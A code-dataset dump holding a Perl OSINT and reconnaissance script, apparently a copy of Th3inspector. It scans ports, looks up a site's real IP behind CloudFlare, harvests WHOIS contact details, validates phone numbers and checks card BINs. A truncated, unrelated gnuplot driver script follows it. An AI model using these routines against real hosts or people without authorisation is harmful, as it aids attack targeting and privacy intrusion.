] | null | null | null | mr.4r.pl | batereck/lacak-orang | 2534950c41ad90ee23ca63c4aa82943b6907ed2a | [
"MIT"
] | null | null | null | #!/usr/bin/perl
use if $^O eq "MSWin32", Win32::Console::ANSI;
use Getopt::Long;
use HTTP::Request;
use LWP::UserAgent;
use IO::Select;
use HTTP::Headers;
use IO::Socket;
use HTTP::Response;
use Term::ANSIColor;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use URI::URL;
use IO::Socket::INET;
use Data::Dumper;
use LWP::Simple;
use JSON qw( decode_json encode_json );
my $ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
GetOptions(
"h|help" => \$help,
"i|info=s" => \$site1,
"n|number=s" => \$PhoneNumber,
"mx|mailserver=s" => \$site2,
"w|whois=s" => \$site3,
"l|location=s" => \$site4,
"c|cloudflare=s" => \$site5,
"a|age=s" => \$site6,
"ua|useragent=s" => \$useragent,
"p|port=s" => \$target,
"b|bin=s" => \$bin,
"s|subdomain=s" => \$site8,
"e|email=s" => \$email,
"cms|cms=s" => \$site7,
);
if ($help) { banner();help(); }
if ($site1) { banner();Websiteinformation(); }
if ($PhoneNumber) { banner();Phonenumberinformation(); }
if ($site2) { banner();FindIPaddressandemailserver(); }
if ($site3) { banner();Domainwhoislookup(); }
if ($site4) { banner();Findwebsitelocation(); }
if ($site5) { banner();CloudFlare(); }
if ($site6) { banner();DomainAgeChecker(); }
if ($useragent) { banner();UserAgent(); }
if ($bin) { banner();BIN(); }
if ($site8) { banner();subdomain(); }
if ($email) { banner();email(); }
if ($site7) { banner();cms(); }
if ($target) { banner();port(); }
unless ($help || $site1 || $PhoneNumber || $site2 || $site3 || $site4 || $site5 || $site6 || $useragent || $bin || $email || $site7 || $site8 || $target) { banner();menu(); }
##### Help #######
sub help {
print item('1'),"Website Information ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -i example.com\n";
print item('2'),"Phone Number Information ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -n xxxxxxx\n";
print item('3'),"Find IP Address And E-mail Server ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -mx example.com\n";
print item('4'),"Domain Whois Lookup ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -w example.com\n";
print item('5'),"Find Website/IP Address Location ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -l example.com\n";
print item('6'),"Bypass CloudFlare ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -c example.com\n";
print item('7'),"Domain Age Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -a example.com\n";
print item('8'),"User Agent Info ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -ua Mozilla/5.0 xxxxxxxxxxxxxxxxxxxx\n";
print item('9'),"Check Active Services On Resource";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -p 127.0.0.1\n";
print item('10'),"Credit Card Bin Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -b 123456\n";
print item('11'),"Subdomain Scanner ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -s example.com\n";
print item('12'),"E-mail Address Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -e example@gmail.com\n";
print item('13'),"Content Management System Checker ";
print color('bold red'),"=> ";
print color("bold white"),"perl Th3inspector.pl -cms example.com\n";
}
##### Banner #######
sub banner {
if ($^O =~ /MSWin32/) {system("mode con: cols=100 lines=29");system("cls"); }else { system("resize -s 28 87");system("clear"); }
print " ,;;;, \n";
print " ;;;;;;; \n";
print " .- `\\, '/_ _____ _ ";
print color('bold red'),"____";
print color('reset');
print " _ _ \n";
print " .' \\ (`(_) |_ _| |_ ";
print color('bold red'),"|__ /";
print color('reset');
print " (_)_ _ ____ __ ___ __| |_ ___ _ _ \n";
print " / `-,. \\ \\_/ | | | ' \\ ";
print color('bold red'),"|_ \\";
print color('reset');
print "\ | | ' \\(_-< '_ \\/ -_) _| _/ _ \\ '_| \n";
print " \\ \\/ \\ `--` |_| |_||_|";
print color('bold red'),"___/";
print color('reset');
print " |_|_||_/__/ .__/\\___\\__|\\__\\___/_| ";
print color('bold green'),"V 1.9\n";
print color('reset');
print " \\ \\ \\ \033[0;31m[\033[0;33m127.0.0.1\033[0;31m] \033[0;37m|_|\033[0;31m [\033[1;34m192.168.1.1\033[0;31m] \033[0;37m\n";
print " / /| | \033[0;31m[\033[0;37mCoded BY Mr.4r-batereck\033[0;31m]\033[0;37m\n";
print " /_/ |_| \n";
print " ( _\\ ( _\\ #:## #:##\n";
print " #:## \n\n";
}
##### Menu #######
sub menu {
print item('01'),"Website Information\n";
print item('02'),"Phone Number Information\n";
print item('03'),"Find IP Address And E-mail Server\n";
print item('04'),"Domain Whois Lookup\n";
print item('05'),"Find Website/IP Address Location\n";
print item('06'),"Bypass CloudFlare\n";
print item('07'),"Domain Age Checker\n";
print item('08'),"User Agent Info\n";
print item('09'),"Check Active Services On Resource\n";
print item('10'),"Credit Card Bin Checker\n";
print item('11'),"Subdomain Scanner\n";
print item('12'),"Check E-mail Address\n";
print item('13'),"Content Management System Checker\n";
print item('14'),"Update\n\n";
print item('-'),"Choose : ";
print color('reset');
chomp($number=<STDIN>);
if($number eq '01'){
banner();
print item(),"Enter Website : ";
chomp($site1=<STDIN>);
banner();
Websiteinformation();
enter();
}if($number eq '02'){
banner();
print item(),"Enter Phone Number : +";
chomp($PhoneNumber=<STDIN>);
banner();
Phonenumberinformation();
enter();
}if($number eq '03'){
banner();
print item(),"Enter Website : ";
chomp($site2=<STDIN>);
banner();
FindIPaddressandemailserver();
enter();
}if($number eq '04'){
banner();
print item(),"Enter Website : ";
chomp($site3=<STDIN>);
banner();
Domainwhoislookup();
enter();
}if($number eq '05'){
banner();
print item(),"Enter Website/IP : ";
chomp($site4=<STDIN>);
banner();
Findwebsitelocation();
enter();
}if($number eq '06'){
banner();
print item(),"Enter Website : ";
chomp($site5=<STDIN>);
banner();
CloudFlare();
enter();
}if($number eq '07'){
banner();
print item(),"Enter Website : ";
chomp($site6=<STDIN>);
banner();
DomainAgeChecker();
enter();
}if($number eq '08'){
banner();
print item(),"Enter User Agent : ";
chomp($useragent=<STDIN>);
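  # Percent-encode the user agent before passing it to the lookup API:
  # escape "/" as %2F and replace spaces with "+".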
my $find = "/";
my $replace = "%2F";
$find = quotemeta $find;
$useragent =~ s/$find/$replace/g;
$useragent =~ s/ /+/g;
banner();
UserAgent();
enter();
}if($number eq '09'){
banner();
port();
enter();
}if($number eq '10'){
banner();
print item(),"Enter First 6 Digits Of A Credit Card Number : ";
chomp($bin=<STDIN>);
banner();
BIN();
enter();
}if($number eq '11'){
banner();
print item(),"Enter website: ";
chomp($site8=<STDIN>);
banner();
subdomain();
enter();
}if($number eq '12'){
banner();
print item(),"Enter E-mail : ";
chomp($email=<STDIN>);
banner();
email();
enter();
}if($number eq '13'){
banner();
print item(),"Enter website: ";
chomp($site7=<STDIN>);
banner();
cms();
enter();
}if($number eq '14'){
update();
}
}
####### Website information #######
sub Websiteinformation {
$url = "https://myip.ms/$site1";
$request = $ua->get($url);
$response = $request->content;
if($response =~/> (.*?) visitors per day </)
{
print item(),"Hosting Info for Website: $site1\n";
print item(),"Visitors per day: $1 \n";
if($response =~/> (.*?) visitors per day on (.*?)</){
print item(),"Visitors per day: $1 \n";
}
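    # Resolve the domain to its IPv4 address: gethostbyname() returns the
    # packed address, which is unpacked into dotted-quad form.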
$ip= (gethostbyname($site1))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip_address ="$a.$b.$c.$d";
print item(),"IP Address: $ip_address\n";
if($response =~/IPv6.png'><a href='\/info\/whois6\/(.*?)'>/)
{
$ipv6_address=$1;
print item(),"Linked IPv6 Address: $ipv6_address\n";
}
if($response =~/IP Location: <\/td> <td class='vmiddle'><span class='cflag (.*?)'><\/span><a href='\/view\/countries\/(.*?)\/Internet_Usage_Statistics_(.*?).html'>(.*?)<\/a>/)
{
$Location=$1;
print item(),"IP Location: $Location\n";
}
if($response =~/IP Reverse DNS (.*?)<\/b><\/div><div class='sval'>(.*?)<\/div>/)
{
$host=$2;
print item(),"IP Reverse DNS (Host): $host\n";
}
if($response =~/Hosting Company: <\/td><td valign='middle' class='bold'> <span class='nounderline'><a title='(.*?)'/)
{
$ownerName=$1;
print item(),"Hosting Company: $ownerName\n";
}
if($response =~/Hosting Company \/ IP Owner: <\/td><td valign='middle' class='bold'> <span class='cflag (.*?)'><\/span> <a href='\/view\/web_hosting\/(.*?)'>(.*?)<\/a>/)
{
$ownerip=$3;
print item(),"Hosting Company IP Owner: $ownerip\n";
}
if($response =~/Hosting Company \/ IP Owner: <\/td><td valign='middle' class='bold'> <span class='nounderline'><a title='(.*?)'/)
{
$ownerip=$1;
print item(),"Hosting Company IP Owner: $ownerip\n";
}
if($response =~/IP Range <b>(.*?) - (.*?)<\/b><br>have <b>(.*?)<\/b>/)
{
print item(),"Hosting IP Range: $1 - $2 ($3 ip) \n";
}
if($response =~/Hosting Address: <\/td><td>(.*?)<\/td><\/tr>/)
{
$address=$1;
print item(),"Hosting Address: $address\n";
}
if($response =~/Owner Address: <\/td><td>(.*?)<\/td>/)
{
$addressowner=$1;
print item(),"Owner Address: $addressowner\n";
}
if($response =~/Hosting Country: <\/td><td><span class='cflag (.*?)'><\/span><a href='\/view\/countries\/(.*?)\/(.*?)'>(.*?)<\/a>/)
{
$HostingCountry=$1;
print item(),"Hosting Country: $HostingCountry\n";
}
if($response =~/Owner Country: <\/td><td><span class='cflag (.*?)'><\/span><a href='\/view\/countries\/(.*?)\/(.*?)'>(.*?)<\/a>/)
{
$OwnerCountry=$1;
print item(),"Owner Country: $OwnerCountry\n";
}
if($response =~/Hosting Phone: <\/td><td>(.*?)<\/td><\/tr>/)
{
$phone=$1;
print item(),"Hosting Phone: $phone\n";
}
if($response =~/Owner Phone: <\/td><td>(.*?)<\/td><\/tr>/)
{
$Ownerphone=$1;
print item(),"Owner Phone: $Ownerphone\n";
}
if($response =~/Hosting Website: <img class='cursor-help noprint left10' border='0' width='12' height='10' src='\/images\/tooltip.gif'><\/td><td><a href='\/(.*?)'>(.*?)<\/a><\/td>/)
{
$website=$1;
print item(),"Hosting Website: $website\n";
}
if($response =~/Owner Website: <img class='cursor-help noprint left10' border='0' width='12' height='10' src='\/(.*?)'><\/td><td><a href='\/(.*?)'>(.*?)<\/a>/)
{
$Ownerwebsite=$3;
print item(),"Owner Website: $Ownerwebsite\n";
}
if($response =~/CIDR:<\/td><td> (.*?)<\/td><\/tr>/)
{
$CIDR=$1;
print item(),"CIDR: $CIDR\n";
}
if($response =~/Owner CIDR: <\/td><td><span class='(.*?)'><a href="\/view\/ip_addresses\/(.*?)">(.*?)<\/a>\/(.*?)<\/span><\/td><\/tr>/)
{
print item(),"Owner CIDR: $3/$4\n\n";
}
if($response =~/Hosting CIDR: <\/td><td><span class='(.*?)'><a href="\/view\/ip_addresses\/(.*?)">(.*?)<\/a>\/(.*?)<\/span><\/td><\/tr>/)
{
print item(),"Hosting CIDR: $3/$4\n\n";
}
$url = "https://dns-api.org/NS/$site1";
$request = $ua->get($url);
$response = $request->content;
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
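 # Print every unique name server found in the dns-api.org response.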
my %seen;
while($response =~m/"value": "(.*?)."/g)
{
$ns=$1;
next if $seen{$ns}++;
print item(),"NS: $ns \n";
}
}
### Phone number information ###########
sub Phonenumberinformation {
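# The numverify (apilayer) access key is fetched from a pastebin paste,
# then used to query the validate endpoint for the given number.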
$url = "https://pastebin.com/raw/egbm0eEk";
$request = $ua->get($url);
$api2 = $request->content;
$url = "http://apilayer.net/api/validate?access_key=$api2&number=$PhoneNumber&country_code=&format=1";
$request = $ua->get($url);
$response = $request->content;
if($response =~/"valid":true/)
{
$valid=$1;
print item(),"Valid : ";
print color("bold green"),"true\n";
if($response =~/local_format":"(.*?)"/)
{
$localformat=$1;
print item(),"Local Format : $localformat\n";
}
if($response =~/international_format":"(.*?)"/)
{
$international_format=$1;
print item(),"International Format : $international_format\n";
}
if($response =~/country_name":"(.*?)"/)
{
$country_name=$1;
print item(),"Country : $country_name\n";
}
if($response =~/location":"(.*?)"/)
{
$location=$1;
print item(),"Location : $location\n";
}
if($response =~/carrier":"(.*?)"/)
{
$carrier=$1;
print item(),"Carrier : $carrier\n";
}
if($response =~/line_type":"(.*?)"/)
{
$line_type=$1;
print item(),"Line Type : $line_type\n";
}
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Phone Number Without +/00\n";
print item('3'),"Check If Phone Number Exists\n";
exit
}
}
### Find IP address and email server ###########
sub FindIPaddressandemailserver {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0");
my $url = "https://dns-api.org/MX/$site2";
$request = $ua->get($url);
$response = $request->content;
if ($response =~ /error/){
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
exit
}
print item(),"Domain name for MX records: $site2\n\n";
my %seen;
while($response =~m/"value": "(.*?)."/g)
{
$mx=$1;
next if $seen{$mx}++;
print item(),"MX: $mx \n";
}
}
### Domain whois lookup ###########
sub Domainwhoislookup {
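# The WhoisXML API username is fetched from a pastebin paste, then used to
# request the whois record for the domain as JSON.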
$url = "https://pastebin.com/raw/YfHdX0jE";
$request = $ua->get($url);
$api4 = $request->content;
$url = "http://www.whoisxmlapi.com//whoisserver/WhoisService?domainName=$site3&username=$api4&outputFormat=JSON";
$request = $ua->get($url);
$response = $request->content;
my $responseObject = decode_json($response);
if (exists $responseObject->{'WhoisRecord'}->{'createdDate'}){
print item(),"Whois lookup for : $site3 \n";
print item(),'Created date: ',
$responseObject->{'WhoisRecord'}->{'createdDate'},"\n";sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'expiresDate'}){
print item(),'Expires date: ',
$responseObject->{'WhoisRecord'}->{'expiresDate'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'contactEmail'}){
print item(),'Contact email: ',
$responseObject->{'WhoisRecord'}->{'contactEmail'},"\n";}sleep(1);
if (exists $responseObject->{'WhoisRecord'}->{'registrant'}->{'name'}){
print item(),'Registrant Name: ',
$responseObject->{'WhoisRecord'}->{'registrant'}->{'name'},"\n";} sleep(1);
# Print the remaining registrant, administrative and technical contact
# fields from the WHOIS record. Each field is printed only when present;
# the sleep(1) after every field keeps the original output pacing.
my %field_labels = (
    name         => 'Name',
    organization => 'Organization',
    street1      => 'Street',
    city         => 'City',
    state        => 'State/Province',
    postalCode   => 'Postal Code',
    country      => 'Country',
    email        => 'Email',
    telephone    => 'Phone',
    fax          => 'Fax',
);
my @contact_sections = (
    [ 'registrant',            'Registrant', [ qw(organization street1 city state postalCode country email telephone fax) ] ],
    [ 'administrativeContact', 'Admin',      [ qw(name organization street1 city state postalCode country email telephone fax) ] ],
    [ 'technicalContact',      'Tech',       [ qw(name organization street1 city state postalCode country email telephone fax) ] ],
);
for my $section (@contact_sections) {
    my ($contact, $prefix, $fields) = @{$section};
    for my $field (@{$fields}) {
        if (exists $responseObject->{'WhoisRecord'}->{$contact}->{$field}) {
            print item(), "$prefix $field_labels{$field}: ",
                $responseObject->{'WhoisRecord'}->{$contact}->{$field}, "\n";
        }
        sleep(1);
    }
}
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
### Find website location ###########
sub Findwebsitelocation {
$ip= (gethostbyname($site4))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip ="$a.$b.$c.$d";
$url = "https://ipapi.co/$ip/json/";
$request = $ua->get($url);
$response = $request->content;
if($response =~/country_name": "(.*?)"/){
print item(),"IP Address: $ip\n";
print item(),"Country: $1\n";
if($response =~/city": "(.*?)"/){
print item(),"City: $1\n";
}if($response =~/region": "(.*?)"/){
print item(),"Region: $1\n";
}if($response =~/region_code": "(.*?)"/){
print item(),"Region Code: $1\n";
}if($response =~/continent_code": "(.*?)"/){
print item(),"Continent Code: $1\n";
}if($response =~/postal": "(.*?)"/){
print item(),"Postal Code: $1\n";
}if($response =~/latitude": (.*?),/){
print item(),"Latitude / Longitude: $1, ";
}if($response =~/longitude": (.*?),/){
print color("bold white"),"$1\n";
}if($response =~/timezone": "(.*?)"/){
print item(),"Timezone: $1\n";
}if($response =~/utc_offset": "(.*?)"/){
print item(),"Utc Offset: $1\n";
}if($response =~/country_calling_code": "(.*?)"/){
print item(),"Calling Code: $1\n";
}if($response =~/currency": "(.*?)"/){
print item(),"Currency: $1\n";
}if($response =~/languages": "(.*?)"/){
print item(),"Languages: $1\n";
}if($response =~/asn": "(.*?)"/){
print item(),"ASN: $1\n";
}if($response =~/org": "(.*?)"/){
print item(),"ORG: $1\n";
}
}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website/IP Working\n";
}
}
### Bypass CloudFlare ###########
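# Works in three steps: resolve the CloudFlare-fronted IP and list the
# domain's nameservers via dns-api.org, ask crimeflare.us for a possible
# direct-connect ("real") IP, then look that IP up on ipinfo.io.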
sub CloudFlare {
my $ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ip= (gethostbyname($site5))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip_address ="$a.$b.$c.$d";
if($ip_address =~ /[0-9]/){
print item(),"CloudFlare IP: $ip_address\n\n";
}
$url = "https://dns-api.org/NS/$site5";
$request = $ua->get($url);
$response = $request->content;
my %seen;
while($response =~m/"value": "(.*?)."/g)
{
$ns=$1;
next if $seen{$ns}++;
print item(),"NS: $ns \n";
}
print color("bold white"),"\n";
$url = "http://www.crimeflare.us/cgi-bin/cfsearch.cgi";
$request = POST $url, [cfS => $site5];
$response = $ua->request($request);
$riahi = $response->content;
if($riahi =~m/">(.*?)<\/a> /g){
print item(),"Real IP: $1\n";
$ip=$1;
}elsif($riahi =~m/not CloudFlare-user nameservers/g){
print item(),"These Are Not CloudFlare-user Nameservers !!\n";
print item(),"This Website Not Using CloudFlare Protection\n";
}elsif($riahi =~m/No direct-connect IP address was found for this domain/g){
print item(),"No Direct Connect IP Address Was Found For This Domain\n";
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
$url = "http://ipinfo.io/$ip/json";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/hostname": "(.*?)"/g){
print item(),"Hostname: $1\n";
}if($response =~m/city": "(.*?)"/g){
print item(),"City: $1\n";
}if($response =~m/region": "(.*?)"/g){
print item(),"Region: $1\n";
}if($response =~m/country": "(.*?)"/g){
print item(),"Country: $1\n";
}if($response =~m/loc": "(.*?)"/g){
print item(),"Location: $1\n";
}if($response =~m/org": "(.*?)"/g){
print item(),"Organization: $1\n";
}
}
### User Agent Info ###########
sub UserAgent {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$url = "https://pastebin.com/raw/pTXVQiuJ";
$request = $ua->get($url);
$api8 = $request->content;
$url = "https://useragentapi.com/api/v4/json/$api8/$useragent";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/ua_type":"(.*?)"/g){
print item(),"User Agent Type: $1\n";
if($response =~m/os_name":"(.*?)"/g){
print item(),"OS name: $1\n";
}if($response =~m/os_version":"(.*?)"/g){
print item(),"OS version: $1\n";
}if($response =~m/browser_name":"(.*?)"/g){
print item(),"Browser name: $1\n";
}if($response =~m/browser_version":"(.*?)"/g){
print item(),"Browser version: $1\n";
}if($response =~m/engine_name":"(.*?)"/g){
print item(),"Engine name: $1\n";
}if($response =~m/engine_version":"(.*?)"/g){
print item(),"Engine version: $1\n";
}
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Check If User Agent Exists\n";
}
}
### Domain Age Checker ###########
sub DomainAgeChecker {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$url = "https://input.payapi.io/v1/api/fraud/domain/age/$site6";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/is (.*?) days (.*?) Date: (.*?)"/g){
$days=$1;
$created=$3;
print item(),"Domain Name : $site6\n";
print item(),"Domain Created on : $created\n";
$url = "http://unitconverter.io/days/years/$days";
$request = $ua->get($url);
$response = $request->content;
if($response =~m/<strong style="color:red"> = (.*?)<\/strong><\/p>/g){
$age=$1;
$age =~ s/ / /g;
print item(),"Domain Age : $age\n";
}
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
######################## Credit card BIN number Check ################################
sub BIN {
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$url = "https://lookup.binlist.net/$bin";
$request = $ua->get($url);
$response = $request->content;
if($response =~/scheme/){
print item(),"Credit card BIN number: $bin XX XXXX XXXX\n";
if($response =~/scheme":"(.*?)"/){
print item(),"Credit card brand: $1\n";
}if($response =~/type":"(.*?)"/){
print item(),"Type: $1\n";
}if($response =~/name":"(.*?)"/){
print item(),"Bank: $1\n";
}if($response =~/url":"(.*?)"/){
print item(),"Bank URL: $1\n";
}if($response =~/phone":"(.*?)"/){
print item(),"Bank Phone: $1\n";
}if($response =~/alpha2":"(.*?)","name":"(.*?)"/){
print item(),"Country Short: $1\n";
print item(),"Country: $2\n";
}if($response =~/latitude":"(.*?)"/){
print item(),"Latitude: $1\n";
}if($response =~/longitude":"(.*?)"/){
print item(),"Longitude: $1\n";
}
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Only First 6 Digits Of A Credit Card Number\n";
}
}
####### Subdomain Scanner #######
sub subdomain {
$url = "https://www.pagesinventory.com/search/?s=$site8";
$request = $ua->get($url);
$response = $request->content;
$ip= (gethostbyname($site8))[4];
my ($a,$b,$c,$d) = unpack('C4',$ip);
$ip_address ="$a.$b.$c.$d";
if($response =~ /Search result for/){
print item(),"Website: $site8\n";
print item(),"IP: $ip_address\n\n";
while($response =~ m/<td><a href=\"\/domain\/(.*?).html\">(.*?)<a href="\/ip\/(.*?).html">/g ) {
print item(),"Subdomain: $1\n";
print item('-'),"IP: $3\n\n";
sleep(1);
}
}elsif($ip_address =~ /[0-9]/){
if($response =~ /Nothing was found/){
print item(),"Website: $site8\n";
print item(),"IP: $ip_address\n\n";
print item(),"No Subdomains Found For This Domain\n";
}}else {
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
####### Port scanner #######
sub port {
print item(),"Enter Website/IP : ";
chomp($target = <STDIN>);
$| = 1;
print "\n";
print item(),"PORT STATE SERVICE\n";
my %ports = (
21 => 'FTP'
,22 => 'SSH'
,23 => 'Telnet'
,25 => 'SMTP'
,43 => 'Whois'
,53 => 'DNS'
,68 => 'DHCP'
,80 => 'HTTP'
,110 => 'POP3'
,115 => 'SFTP'
,119 => 'NNTP'
,123 => 'NTP'
,139 => 'NetBIOS'
,143 => 'IMAP'
,161 => 'SNMP'
,220 => 'IMAP3'
,389 => 'LDAP'
,443 => 'SSL'
,1521 => 'Oracle SQL'
,2049 => 'NFS'
,3306 => 'mySQL'
,5800 => 'VNC'
,8080 => 'HTTP'
);
foreach my $p ( sort {$a<=>$b} keys( %ports ) )
{
$socket = IO::Socket::INET->new(PeerAddr => $target , PeerPort => "$p" , Proto => 'tcp' , Timeout => 1);
if( $socket ){
print item(); printf("%4s Open %s\n", $p, $ports{$p});
}else{
print item(); printf("%4s Closed %s\n", $p, $ports{$p});
}
}
}
####### Check e-mail address #######
sub email {
$url = "https://api.2ip.me/email.txt?email=$email";
$request = $ua->get($url);
$response = $request->content;
if($response =~/true/)
{
print item(),"E-mail address : $email \n";
print item(),"Valid : ";
print color('bold green'),"YES\n";
print color('reset');
}elsif($response =~/false/){
print item(),"E-mail address : $email \n";
print item(),"Valid : ";
print color('bold red'),"NO\n";
print color('reset');
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Check If E-mail Exists\n";
}
}
####### Check Content Management System (CMS) #######
sub cms {
$url = "https://pastebin.com/raw/CYaZrPFP";
$request = $ua->get($url);
$api12 = $request->content;
$url = "https://whatcms.org/APIEndpoint?key=$api12&url=$site7";
$request = $ua->get($url);
$response = $request->content;
my $responseObject = decode_json($response);
if($response =~/Success/){
print item(),"WebSite : $site7 \n";
if (exists $responseObject->{'result'}->{'name'}){
print item(),'CMS: ',
$responseObject->{'result'}->{'name'},"\n";}
if (exists $responseObject->{'result'}->{'version'}){
print item(),'Version: ',
$responseObject->{'result'}->{'version'},"\n";}
}elsif($response =~/CMS Not Found/){
print item(),"WebSite : $site7 \n";
print item(),"CMS :";
print color("bold red")," Not Found\n";
print color('reset');
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
##### Update #######
sub update {
if ($^O =~ /MSWin32/) {
banner();
print item('1'),"Download Th3inspector\n";
print item('2'),"Extract Th3inspector into Desktop\n";
print item('3'),"Open CMD and type the following commands:\n";
print item('4'),"cd Desktop/Th3inspector-master/\n";
print item('5'),"perl Th3inspector.pl\n";
}else {
$linux = "/usr/share/Th3inspector";
$termux = "/data/data/com.termux/files/usr/share/Th3inspector";
if (-d $linux){
system("bash /usr/share/Th3inspector/update.sh");
} elsif (-d $termux){
system("chmod +x /data/data/com.termux/files/usr/share/Th3inspector/update.sh && bash /data/data/com.termux/files/usr/share/Th3inspector/update.sh");
}
}
}
##### Enter #######
sub enter {
print "\n";
print item(),"Press ";
print color('bold red'),"[";
print color("bold white"),"ENTER";
print color('bold red'),"] ";
print color("bold white"),"Key To Continue\n";
local( $| ) = ( 1 );
my $resp = <STDIN>;
banner();
menu();
}
### Item format ###
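# Returns the list of colored fragments making up the " [+] " prefix used on
# every output line; an optional argument replaces the "+" marker, e.g. item('1').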
sub item
{
my $n = shift // '+';
return color('bold red')," ["
, color('bold green'),"$n"
, color('bold red'),"] "
, color("bold white")
;
}
__END__
| 38.436508 | 189 | 0.524288 |
eda8aab1cb2512535e5d9ffcd94aa024a3f85c1c | 1,917 | pl | Perl | ABC/Tests_JavaPlot/global/driveGnuPlots_v2.pl | andrejadd/ABC-bee-opt | 746b2f8eb8eeab27e0af515aa129ad8a00b035e5 | [
"MIT"
] | null | null | null | ABC/Tests_JavaPlot/global/driveGnuPlots_v2.pl | andrejadd/ABC-bee-opt | 746b2f8eb8eeab27e0af515aa129ad8a00b035e5 | [
"MIT"
] | null | null | null | ABC/Tests_JavaPlot/global/driveGnuPlots_v2.pl | andrejadd/ABC-bee-opt | 746b2f8eb8eeab27e0af515aa129ad8a00b035e5 | [
"MIT"
] | null | null | null | #!/usr/bin/perl -w
use strict;
sub main {
my $numberOfStreams = 1;
print "Will display $numberOfStreams Streams (in $numberOfStreams windows)...\n";
my $samples = <STDIN>;
my @minmax = split(/:/, <STDIN>);
chomp $samples;
chomp($minmax[1]);
my @sampleSizes;
for(my $i=0; $i<$numberOfStreams; $i++) {
push @sampleSizes, $samples;
print "Stream ".($i+1)." will use a window of $samples samples.\n";
}
my @ranges;
for(my $i=0; $i<$numberOfStreams; $i++) {
my $miny = $minmax[0];
my $maxy = $minmax[1];
push @ranges, [ $miny, $maxy ];
print "Stream ".($i+1)." will use a range of [$miny, $maxy]\n";
}
my @gnuplots;
my @buffers;
shift @ARGV; # number of streams
for(my $i=0; $i<$numberOfStreams; $i++) {
shift @ARGV; # sample size
shift @ARGV; # miny
shift @ARGV; # maxy
local *PIPE;
open PIPE, "|gnuplot" || die "Can't initialize gnuplot number ".($i+1)."\n";
select((select(PIPE), $| = 1)[0]);
push @gnuplots, *PIPE;
#print PIPE "set xtics\n";
#print PIPE "set ytics\n";
print PIPE "set xrange [".($ranges[$i]->[0]).":".($ranges[$i]->[1])."]\n";
print PIPE "set yrange [".($ranges[$i]->[0]).":".($ranges[$i]->[1])."]\n";
print PIPE "set style data points\n";
print PIPE "set grid\n";
my @data = [];
push @buffers, @data;
}
my $streamIdx = 0;
select((select(STDOUT), $| = 1)[0]);
my $pip = $gnuplots[$streamIdx];
my $loop = 0;
my $run = 1;
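# Main loop: each iteration reads up to $samples data lines (a line matching
# "exit" stops the loop) and replots the collected window through the gnuplot pipe.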
